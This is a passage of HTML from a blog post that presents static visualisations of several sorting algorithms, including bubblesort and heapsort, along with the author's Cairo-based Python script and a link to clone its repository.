not being an eyesore.\nI might produce some scaled-up annotated versions of the diagrams for some\nfuture post.<\/p>\n<h2 id=\"bubblesort\">Bubblesort<\/h2>\n<div class=\"media\">\n    <a href=\"bubble.png\">\n        <img src=\"bubble.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Bubble sort\n    <\/div>\n    \n<\/div>\n<p>So, lets start with a static visualisation of <a\nhref=\"http:\/\/en.wikipedia.org\/wiki\/Bubble_sort\">bubblesort<\/a>. Notice that,\neven without any labelling, we can \"read off\" the answers to all the questions\nposed above pretty trivially:<\/p>\n<ul>\n<li>The sorted portion of the sequence is clearly visible as a triangular\nblock in the bottom-right of the image, so we can easily locate the point\nat which half the array is sorted, and read off the percentage of time\ntaken.<\/li>\n<li>Since the start and end positions of each element is visible on the\ngraph, finding an element that moved about 50% of the length of the array\nis simple.<\/li>\n<li>Similarly, the percentage of the array that is sorted at 20% and 80% of\nthe process can just be read off.<\/li>\n<li>Lastly, we can clearly see that the curve of sorted elements is not\nlinear, but is probably close to n^2.<\/li>\n<\/ul>\n<p>Other features of the algorithm are also clearer - for instance, the famous\n\"rabbits\" and \"turtles\" are clearly identifiable. In the diagram the \"rabbits\"\nare the dark lines sweeping down to their positions rapidly, and the turtles\nare the lighter lines that gradually curve towards the top right of the image.<\/p>\n<h2 id=\"heapsort\">Heapsort<\/h2>\n<div class=\"media\">\n    <a href=\"heap.png\">\n        <img src=\"heap.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Heapsort\n    <\/div>\n    \n<\/div>\n<p>Now, lets return to the <a\nhref=\"http:\/\/en.wikipedia.org\/wiki\/Heapsort\">heapsort<\/a> image at the top of\nthis article. First, a quick (and superficial) refresher on the algorithm\nitself:<\/p>\n<ul>\n<li>Step 1: Arrange the elements in the array to form a \"heap\" -\na data structure that allows us to find the largest element in constant\ntime.<\/li>\n<li>Step 2: Peel off the largest element, and move it to below the heap.<\/li>\n<li>Step 3: The heap is now disrupted, so we do some work to re-establish the\nheap property.<\/li>\n<li>Step 4: Repeat steps 2-3 until the entire array is sorted.<\/li>\n<\/ul>\n<p>Looking at the visualisation, we can see Step 1 clearly - it is the\nportion of the diagram before the point where the largest element in the\narray is slotted into place. After that, we can see a repeated pattern -\nthe heap is re-established and the greatest element is moved to below the\nheap again and again util the array is sorted.<\/p>\n<p>We can immediately make some quite sophisticated observations. For example, we\ncan see that although initially establishing the heap is costly,\nre-establishing it after the greatest element is removed requires an\napproximately constant amount of time throughout the sorting process - meaning\nthat the time required is relatively independent of the number of items still\nin the heap. This is an interesting property that is not immediately obvious\nfrom an analysis of the algorithm itself.<\/p>\n<p>Right - enough prattling! Here is a selection of other visualised algorithms\nfor your viewing pleasure:<\/p>\n<h2 id=\"quicksort\">Quicksort<\/h2>\n<div class=\"media\">\n    <a href=\"quick.png\">\n        <img src=\"quick.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Quicksort\n    <\/div>\n    \n<\/div><h2 id=\"selection-sort\">Selection Sort<\/h2>\n<div class=\"media\">\n    <a href=\"selection.png\">\n        <img src=\"selection.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Selection sort\n    <\/div>\n    \n<\/div><h2 id=\"insertion-sort\">Insertion Sort<\/h2>\n<div class=\"media\">\n    <a href=\"listinsertion.png\">\n        <img src=\"listinsertion.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Insertion sort\n    <\/div>\n    \n<\/div><h2 id=\"shell-sort\">Shell Sort<\/h2>\n<div class=\"media\">\n    <a href=\"shell.png\">\n        <img src=\"shell.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Shell sort\n    <\/div>\n    \n<\/div><h2 id=\"the-code\">The Code<\/h2>\n<p><a href=\"visualise.py\">visualise.py<\/a><\/p>\n<p>This whole thing started partly as an excuse to get familiar with the <a\nhref=\"http:\/\/cairographics.org\">Cairo<\/a> graphics library. It produces\nbeautiful, clean images, and appears to be both portable and well designed. It\nalso comes with a set of Python bindings that are maintained as part of the\nproject itself - a big plus in my books. Firefox 3 will use Cairo as its\nstandard rendering back end, which will instantly make it one of the most widely\nused vector graphics libraries out there.<\/p>\n<p>The examples on this page were generated using a command somewhat like the\nfollowing:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">.\/visualise.py<\/span><span style=\"color: #005CC5;\"> -l 6 -x 700 -y 300 -n 15<\/span><\/span><\/code><\/pre>\n<p><strong>Update 9\/8\/09<\/strong>: A newer version of the code is now available on <a\nhref=\"http:\/\/github.com\/cortesi\/sortvis\/tree\/master\">github<\/a>. You can check\nit out like so:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">git<\/span><span style=\"color: #032F62;\"> clone git:\/\/github.com\/cortesi\/sortvis.git<\/span><\/span><\/code><\/pre>"}]}